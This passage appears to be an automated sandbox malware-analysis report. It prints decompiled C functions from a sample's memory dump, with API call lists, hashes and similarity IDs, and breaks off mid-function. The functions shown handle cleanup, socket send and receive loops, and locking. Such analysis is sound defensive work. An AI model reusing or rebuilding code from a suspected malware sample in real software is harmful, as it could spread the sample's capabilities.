                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d51c0cfb7cecbe22f3a005448584aa28a11641046ad401d5bf26070a09b22ed4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3F03172A01428AB9710EEEF84424CAF7F69FC8364B128576FC18E3264E971ED1146F2
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E0040DA20(intOrPtr* __ebx, void* __edi) {
                                                                                                                                                                                                                                                                  				void* _t8;
                                                                                                                                                                                                                                                                  				intOrPtr* _t18;
                                                                                                                                                                                                                                                                  				intOrPtr _t23;
                                                                                                                                                                                                                                                                  				intOrPtr _t26;
                                                                                                                                                                                                                                                                  				void* _t28;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t18 = __ebx;
                                                                                                                                                                                                                                                                  				if(__ebx != 0 &&  *__ebx == 0x756470) {
                                                                                                                                                                                                                                                                  					SetEvent( *(__ebx + 0x10));
                                                                                                                                                                                                                                                                  					WaitForSingleObject( *(__ebx + 0x14), 0xffffffff);
                                                                                                                                                                                                                                                                  					CloseHandle( *(__ebx + 0x14));
                                                                                                                                                                                                                                                                  					_t26 =  *((intOrPtr*)(__ebx + 0x20));
                                                                                                                                                                                                                                                                  					if(_t26 == 0) {
                                                                                                                                                                                                                                                                  						L6:
                                                                                                                                                                                                                                                                  						E00409320( *((intOrPtr*)(_t18 + 8)));
                                                                                                                                                                                                                                                                  						return E00408990(_t18);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					do {
                                                                                                                                                                                                                                                                  						E00408990( *((intOrPtr*)(_t26 + 0x18)));
                                                                                                                                                                                                                                                                  						_t23 =  *((intOrPtr*)(_t26 + 0x1c));
                                                                                                                                                                                                                                                                  						E00408990(_t26);
                                                                                                                                                                                                                                                                  						_t28 = _t28 + 8;
                                                                                                                                                                                                                                                                  						_t26 = _t23;
                                                                                                                                                                                                                                                                  					} while (_t23 != 0);
                                                                                                                                                                                                                                                                  					goto L6;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t8;
                                                                                                                                                                                                                                                                  			}








                                                                                                                                                                                                                                                                  0x0040da20
                                                                                                                                                                                                                                                                  0x0040da22
                                                                                                                                                                                                                                                                  0x0040da31
                                                                                                                                                                                                                                                                  0x0040da3d
                                                                                                                                                                                                                                                                  0x0040da47
                                                                                                                                                                                                                                                                  0x0040da4d
                                                                                                                                                                                                                                                                  0x0040da52
                                                                                                                                                                                                                                                                  0x0040da71
                                                                                                                                                                                                                                                                  0x0040da75
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040da83
                                                                                                                                                                                                                                                                  0x0040da55
                                                                                                                                                                                                                                                                  0x0040da59
                                                                                                                                                                                                                                                                  0x0040da5e
                                                                                                                                                                                                                                                                  0x0040da62
                                                                                                                                                                                                                                                                  0x0040da67
                                                                                                                                                                                                                                                                  0x0040da6a
                                                                                                                                                                                                                                                                  0x0040da6c
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040da70
                                                                                                                                                                                                                                                                  0x0040da84

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,00009E34,0040D68D), ref: 0040DA31
                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040DA3D
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040DA47
                                                                                                                                                                                                                                                                    • Part of subcall function 00408990: RtlFreeHeap.NTDLL(02220000,00000000,00401192,?,00401192,?), ref: 004089EB
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                                                                                                                                                                                                  • String ID: pdu
                                                                                                                                                                                                                                                                  • API String ID: 309973729-2320407122
                                                                                                                                                                                                                                                                  • Opcode ID: 6f43b358d19db0e95675904508cb0de8052414ca6e57bc3c5e63f9fa9e4cb84e
                                                                                                                                                                                                                                                                  • Instruction ID: 681866068359fbce6a25617bf8070456bf8c17b75bf7d52c20a0952ba5eed7f9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f43b358d19db0e95675904508cb0de8052414ca6e57bc3c5e63f9fa9e4cb84e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8F0C8B69002109BCB24AFA5EC84C1B77B89F48320304467EFD547B386CA38EC09CBA5
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 29%
                                                                                                                                                                                                                                                                  			E0040E750(char _a4) {
                                                                                                                                                                                                                                                                  				long _v4;
                                                                                                                                                                                                                                                                  				struct _OVERLAPPED* _v8;
                                                                                                                                                                                                                                                                  				long _v12;
                                                                                                                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                                                                                                                  				signed int _t31;
                                                                                                                                                                                                                                                                  				signed int _t32;
                                                                                                                                                                                                                                                                  				signed int _t36;
                                                                                                                                                                                                                                                                  				struct _OVERLAPPED* _t38;
                                                                                                                                                                                                                                                                  				long _t43;
                                                                                                                                                                                                                                                                  				char _t51;
                                                                                                                                                                                                                                                                  				struct _OVERLAPPED* _t52;
                                                                                                                                                                                                                                                                  				long* _t54;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t54 =  &_v12;
                                                                                                                                                                                                                                                                  				_t51 = _a4;
                                                                                                                                                                                                                                                                  				_t52 = 0;
                                                                                                                                                                                                                                                                  				_v4 = 0;
                                                                                                                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                                                                                                                  				_t31 = GetQueuedCompletionStatus( *(_t51 + 8),  &_v4,  &_v12,  &_v8, 0xffffffff);
                                                                                                                                                                                                                                                                  				_t43 = _v12;
                                                                                                                                                                                                                                                                  				_t32 = _t31 & 0xffffff00 | _t31 != 0x00000000;
                                                                                                                                                                                                                                                                  				if(_t43 == 0) {
                                                                                                                                                                                                                                                                  					return _t32;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				do {
                                                                                                                                                                                                                                                                  					if(_t32 == 0) {
                                                                                                                                                                                                                                                                  						_t38 =  *((intOrPtr*)(_t43 + 0x260));
                                                                                                                                                                                                                                                                  						__imp__WSAGetOverlappedResult(_t38, _v8,  &_v4, 0,  &_a4);
                                                                                                                                                                                                                                                                  						if(_t38 == 0) {
                                                                                                                                                                                                                                                                  							__imp__#111();
                                                                                                                                                                                                                                                                  							_t52 = _t38;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_push(_t52);
                                                                                                                                                                                                                                                                  					E0040E560(_v8, _v4, _v12);
                                                                                                                                                                                                                                                                  					_t54 =  &(_t54[1]);
                                                                                                                                                                                                                                                                  					_t52 = 0;
                                                                                                                                                                                                                                                                  					_v4 = 0;
                                                                                                                                                                                                                                                                  					_v12 = 0;
                                                                                                                                                                                                                                                                  					_v8 = 0;
                                                                                                                                                                                                                                                                  					_t36 = GetQueuedCompletionStatus( *(_t51 + 8),  &_v4,  &_v12,  &_v8, 0xffffffff);
                                                                                                                                                                                                                                                                  					_t43 = _v12;
                                                                                                                                                                                                                                                                  					_t32 = _t36 & 0xffffff00 | _t36 != 0x00000000;
                                                                                                                                                                                                                                                                  				} while (_t43 != 0);
                                                                                                                                                                                                                                                                  				return _t32;
                                                                                                                                                                                                                                                                  			}















                                                                                                                                                                                                                                                                  0x0040e750
                                                                                                                                                                                                                                                                  0x0040e75c
                                                                                                                                                                                                                                                                  0x0040e773
                                                                                                                                                                                                                                                                  0x0040e777
                                                                                                                                                                                                                                                                  0x0040e77b
                                                                                                                                                                                                                                                                  0x0040e77f
                                                                                                                                                                                                                                                                  0x0040e783
                                                                                                                                                                                                                                                                  0x0040e785
                                                                                                                                                                                                                                                                  0x0040e78b
                                                                                                                                                                                                                                                                  0x0040e790
                                                                                                                                                                                                                                                                  0x0040e80f
                                                                                                                                                                                                                                                                  0x0040e80f
                                                                                                                                                                                                                                                                  0x0040e793
                                                                                                                                                                                                                                                                  0x0040e795
                                                                                                                                                                                                                                                                  0x0040e7a7
                                                                                                                                                                                                                                                                  0x0040e7af
                                                                                                                                                                                                                                                                  0x0040e7b7
                                                                                                                                                                                                                                                                  0x0040e7b9
                                                                                                                                                                                                                                                                  0x0040e7bf
                                                                                                                                                                                                                                                                  0x0040e7bf
                                                                                                                                                                                                                                                                  0x0040e7b7
                                                                                                                                                                                                                                                                  0x0040e7cd
                                                                                                                                                                                                                                                                  0x0040e7ce
                                                                                                                                                                                                                                                                  0x0040e7d3
                                                                                                                                                                                                                                                                  0x0040e7e9
                                                                                                                                                                                                                                                                  0x0040e7ed
                                                                                                                                                                                                                                                                  0x0040e7f1
                                                                                                                                                                                                                                                                  0x0040e7f5
                                                                                                                                                                                                                                                                  0x0040e7f9
                                                                                                                                                                                                                                                                  0x0040e7fb
                                                                                                                                                                                                                                                                  0x0040e801
                                                                                                                                                                                                                                                                  0x0040e804
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 0040E783
                                                                                                                                                                                                                                                                  • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 0040E7AF
                                                                                                                                                                                                                                                                  • WSAGetLastError.WS2_32 ref: 0040E7B9
                                                                                                                                                                                                                                                                  • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 0040E7F9
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2074799992-0
                                                                                                                                                                                                                                                                  • Opcode ID: 932397d408765186933d4a6ef8f6ec9becc02e2dac47d78dfefd6a6c2ad256da
                                                                                                                                                                                                                                                                  • Instruction ID: 9fa0d190d6e29d18b90f4a83acc4cb02c1da8db6fe46cf76fa1674e9ca939a6c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 932397d408765186933d4a6ef8f6ec9becc02e2dac47d78dfefd6a6c2ad256da
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5215E711083119BC200DF56D880D5BB7ECBFC8B54F144A2EF598A3291D734EA09CBAA
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 0040E488
                                                                                                                                                                                                                                                                  • WSAGetLastError.WS2_32(?,?,0040E9A4), ref: 0040E490
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000001,?,?,0040E9A4), ref: 0040E4A6
                                                                                                                                                                                                                                                                  • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 0040E4CC
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Recv$ErrorLastSleep
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3668019968-0
                                                                                                                                                                                                                                                                  • Opcode ID: 808051cf4c25f8d78f6be8b19897f5cc4abf4f17fe048894847bde9b845f694e
                                                                                                                                                                                                                                                                  • Instruction ID: f60af05fe9e946153d7423b5ea7d9ed04cc507d8caf150a665a7eef65fd161d3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 808051cf4c25f8d78f6be8b19897f5cc4abf4f17fe048894847bde9b845f694e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1511AD76108305AFD320DF65EC84AABB7ECEB88700F40493EF945E2140E676E90D97B6
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 0040E30C
                                                                                                                                                                                                                                                                  • WSAGetLastError.WS2_32 ref: 0040E312
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000001), ref: 0040E328
                                                                                                                                                                                                                                                                  • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 0040E34A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Send$ErrorLastSleep
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2121970615-0
                                                                                                                                                                                                                                                                  • Opcode ID: 366a37056b0dc1f51f69018f0e1f9e1bfaea74e70fcce9b28d20fa95ce7c14e7
                                                                                                                                                                                                                                                                  • Instruction ID: 81c4ec745dd4513a9ad0e7e8fad5c67f00d8ce5ff8787c200ce92e4071391af0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 366a37056b0dc1f51f69018f0e1f9e1bfaea74e70fcce9b28d20fa95ce7c14e7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B014472244305AAE730DA96DC85F9B77A8DBC4711F044839F604D62C0C7B6A5459B79
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E0040BAF0(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                  				intOrPtr* _v8;
                                                                                                                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                                                                                                                  				void* _t20;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				if(_a4 != 0) {
                                                                                                                                                                                                                                                                  					_v8 = _a4;
                                                                                                                                                                                                                                                                  					EnterCriticalSection(_v8 + 4);
                                                                                                                                                                                                                                                                  					_v12 = 0;
                                                                                                                                                                                                                                                                  					while(_v12 <  *_v8) {
                                                                                                                                                                                                                                                                  						_t11 = _v8 + 0x1c; // 0xfe5ae850
                                                                                                                                                                                                                                                                  						CloseHandle( *( *_t11 + _v12 * 4));
                                                                                                                                                                                                                                                                  						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					LeaveCriticalSection(_v8 + 4);
                                                                                                                                                                                                                                                                  					DeleteCriticalSection(_v8 + 4);
                                                                                                                                                                                                                                                                  					_t18 = _v8 + 0x1c; // 0xfe5ae850
                                                                                                                                                                                                                                                                  					E00408990( *_t18);
                                                                                                                                                                                                                                                                  					return E00408990(_a4);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t20;
                                                                                                                                                                                                                                                                  			}






                                                                                                                                                                                                                                                                  0x0040bafa
                                                                                                                                                                                                                                                                  0x0040baff
                                                                                                                                                                                                                                                                  0x0040bb09
                                                                                                                                                                                                                                                                  0x0040bb0f
                                                                                                                                                                                                                                                                  0x0040bb21
                                                                                                                                                                                                                                                                  0x0040bb2e
                                                                                                                                                                                                                                                                  0x0040bb38
                                                                                                                                                                                                                                                                  0x0040bb1e
                                                                                                                                                                                                                                                                  0x0040bb1e
                                                                                                                                                                                                                                                                  0x0040bb47
                                                                                                                                                                                                                                                                  0x0040bb54
                                                                                                                                                                                                                                                                  0x0040bb5d
                                                                                                                                                                                                                                                                  0x0040bb61
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040bb72
                                                                                                                                                                                                                                                                  0x0040bb78

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(0040E9A0), ref: 0040BB09
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(0040E9A4), ref: 0040BB38
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(0040E9A0), ref: 0040BB47
                                                                                                                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(0040E9A0), ref: 0040BB54
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3102160386-0
                                                                                                                                                                                                                                                                  • Opcode ID: a12ba514adef2c7af3f507a1e64daef258edfafbafaaefcb5a7a363cca2a3f1b
                                                                                                                                                                                                                                                                  • Instruction ID: 372fde51beb75ce8a5f14432a71d852ad4f12131a1d584bef4942ad9e05f072d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a12ba514adef2c7af3f507a1e64daef258edfafbafaaefcb5a7a363cca2a3f1b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A21161B4900208EBDB14DF94D984A5DB7B5FF44309F1081B9E906BB345D734EE94DB89
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E0040DFA0(void* __esi) {
                                                                                                                                                                                                                                                                  				intOrPtr _t13;
                                                                                                                                                                                                                                                                  				intOrPtr _t19;
                                                                                                                                                                                                                                                                  				struct _CRITICAL_SECTION* _t21;
                                                                                                                                                                                                                                                                  				void* _t22;
                                                                                                                                                                                                                                                                  				intOrPtr _t23;
                                                                                                                                                                                                                                                                  				void* _t24;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t22 = __esi;
                                                                                                                                                                                                                                                                  				_t23 =  *((intOrPtr*)(_t24 + 0xc));
                                                                                                                                                                                                                                                                  				_t21 = _t23 + 0x244;
                                                                                                                                                                                                                                                                  				EnterCriticalSection(_t21);
                                                                                                                                                                                                                                                                  				if(__esi == 0) {
                                                                                                                                                                                                                                                                  					L9:
                                                                                                                                                                                                                                                                  					LeaveCriticalSection(_t21);
                                                                                                                                                                                                                                                                  					return 1;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					if(InterlockedExchangeAdd(__esi + 0x14, 0) == 0) {
                                                                                                                                                                                                                                                                  						_t13 =  *((intOrPtr*)(__esi + 0x38));
                                                                                                                                                                                                                                                                  						_t19 =  *((intOrPtr*)(__esi + 0x34));
                                                                                                                                                                                                                                                                  						if(_t13 != 0) {
                                                                                                                                                                                                                                                                  							 *((intOrPtr*)(_t13 + 0x34)) = _t19;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(_t19 == 0) {
                                                                                                                                                                                                                                                                  							 *((intOrPtr*)(_t23 + 0x25c)) = _t13;
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							 *((intOrPtr*)(_t19 + 0x38)) = _t13;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						E00408990( *((intOrPtr*)(_t22 + 0x2c)));
                                                                                                                                                                                                                                                                  						E00408990(_t22);
                                                                                                                                                                                                                                                                  						goto L9;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						LeaveCriticalSection(_t21);
                                                                                                                                                                                                                                                                  						return 0;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}









                                                                                                                                                                                                                                                                  0x0040dfa0
                                                                                                                                                                                                                                                                  0x0040dfa2
                                                                                                                                                                                                                                                                  0x0040dfa7
                                                                                                                                                                                                                                                                  0x0040dfb0
                                                                                                                                                                                                                                                                  0x0040dfb8
                                                                                                                                                                                                                                                                  0x0040e007
                                                                                                                                                                                                                                                                  0x0040e008
                                                                                                                                                                                                                                                                  0x0040e013
                                                                                                                                                                                                                                                                  0x0040dfba
                                                                                                                                                                                                                                                                  0x0040dfc8
                                                                                                                                                                                                                                                                  0x0040dfd9
                                                                                                                                                                                                                                                                  0x0040dfdc
                                                                                                                                                                                                                                                                  0x0040dfe1
                                                                                                                                                                                                                                                                  0x0040dfe3
                                                                                                                                                                                                                                                                  0x0040dfe3
                                                                                                                                                                                                                                                                  0x0040dfe8
                                                                                                                                                                                                                                                                  0x0040dfef
                                                                                                                                                                                                                                                                  0x0040dfea
                                                                                                                                                                                                                                                                  0x0040dfea
                                                                                                                                                                                                                                                                  0x0040dfea
                                                                                                                                                                                                                                                                  0x0040dff9
                                                                                                                                                                                                                                                                  0x0040dfff
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040dfca
                                                                                                                                                                                                                                                                  0x0040dfcd
                                                                                                                                                                                                                                                                  0x0040dfd8
                                                                                                                                                                                                                                                                  0x0040dfd8
                                                                                                                                                                                                                                                                  0x0040dfc8

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,0040E06C,?,?), ref: 0040DFB0
                                                                                                                                                                                                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040DFC0
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0040E06C,?,?), ref: 0040DFCD
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0040E06C,?,?), ref: 0040E008
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2223660684-0
                                                                                                                                                                                                                                                                  • Opcode ID: c69c8b8543103846eda8a8038a6afc10a29883234028d3f7b3eeb50e10c3c6c8
                                                                                                                                                                                                                                                                  • Instruction ID: 10ffaa5ee4f4450ed6c24471392a2b760de4a10e81b3918d49f549c16643c8c6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c69c8b8543103846eda8a8038a6afc10a29883234028d3f7b3eeb50e10c3c6c8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B01F7756423019FC3309F66ED44AAB73A8AF85721B00543EF447E7A41DB34E409CB29
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 66%
                                                                                                                                                                                                                                                                  			E0040C950(char* _a4) {
                                                                                                                                                                                                                                                                  				char _v8;
                                                                                                                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                                                                                                                  				char _v16;
                                                                                                                                                                                                                                                                  				intOrPtr* _v20;
                                                                                                                                                                                                                                                                  				void* _v24;
                                                                                                                                                                                                                                                                  				void* _v28;
                                                                                                                                                                                                                                                                  				intOrPtr _v32;
                                                                                                                                                                                                                                                                  				intOrPtr _v36;
                                                                                                                                                                                                                                                                  				intOrPtr _t44;
                                                                                                                                                                                                                                                                  				intOrPtr* _t46;
                                                                                                                                                                                                                                                                  				intOrPtr _t59;
                                                                                                                                                                                                                                                                  				intOrPtr _t62;
                                                                                                                                                                                                                                                                  				void* _t88;
                                                                                                                                                                                                                                                                  				void* _t89;
                                                                                                                                                                                                                                                                  				void* _t90;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                                                                                                                  				_t44 = E0040BF80(_a4,  &_v8);
                                                                                                                                                                                                                                                                  				_t89 = _t88 + 8;
                                                                                                                                                                                                                                                                  				_v12 = _t44;
                                                                                                                                                                                                                                                                  				if(_v12 != 0) {
                                                                                                                                                                                                                                                                  					_t46 = E0040BD20(_v12);
                                                                                                                                                                                                                                                                  					_t90 = _t89 + 4;
                                                                                                                                                                                                                                                                  					_v20 = _t46;
                                                                                                                                                                                                                                                                  					if(_v20 != 0) {
                                                                                                                                                                                                                                                                  						_v24 = 0;
                                                                                                                                                                                                                                                                  						_push( &_v24);
                                                                                                                                                                                                                                                                  						_push(_v20);
                                                                                                                                                                                                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xb4))))() == 0 && _v24 != 0) {
                                                                                                                                                                                                                                                                  							_v28 = 0;
                                                                                                                                                                                                                                                                  							_push( &_v28);
                                                                                                                                                                                                                                                                  							_push(_v24);
                                                                                                                                                                                                                                                                  							if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x30))))() == 0 && _v28 != 0) {
                                                                                                                                                                                                                                                                  								_t59 = E0040C900(_v28);
                                                                                                                                                                                                                                                                  								_t90 = _t90 + 4;
                                                                                                                                                                                                                                                                  								_v32 = _t59;
                                                                                                                                                                                                                                                                  								if(_v32 != 0) {
